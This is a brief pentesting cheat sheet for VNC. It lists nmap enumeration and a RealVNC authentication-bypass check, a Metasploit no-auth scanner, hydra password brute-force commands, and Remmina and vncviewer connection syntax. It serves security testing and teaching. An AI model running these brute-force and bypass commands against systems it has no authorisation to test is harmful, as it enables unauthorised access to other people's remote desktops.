VNC (Virtual Network Computing) Pentesting

VNC is a graphical desktop sharing system that uses the Remote Frame Buffer protocol to remotely control another computer. Default ports are 5800, 5801, 5900, 5901.

Enumeration

nmap --script vnc-info -p 5900 <target-ip>
# RealVNC authentication bypass (CVE-2006-2369)
nmap --script realvnc-auth-bypass -p 5900 <target-ip>

msf> use auxiliary/scanner/vnc/vnc_none_auth

Brute Force Credentials

VNC server does not use the username, but only the password.

hydra -P passwords.txt vnc://<target-ip>
hydra -P passwords.txt <target-ip> vnc

Connect

Using Remmina

remmina
remmina -c vnc://<target-ip>
remmina -c vnc://username@vulnerable.com
remmina -c vnc:vulnerable.com?VncUsername=username
remmina -c vnc://username:password@vulnerable.com
remmina -c vnc://vulnerable.com?VncUsername=username\&VncPassword=password

Using VNC Viewer

If we don’t have vncviewer, install it first:

sudo apt install tigervnc-viewer

Then run the following command to connect:

vncviewwer 10.0.0.1:5901
# with password file
vncviewer -passwd ./passwd.txt 10.0.0.1:5901

PreviousUPnP (Universal Plug and Play) Pentesting NextWASTE Pentesting

Last updated 1 month ago

hashtagEnumeration

hashtagBrute Force Credentials

hashtagConnect

hashtagUsing Remmina

hashtagUsing VNC Viewer

Enumeration

Brute Force Credentials

Connect

Using Remmina

Using VNC Viewer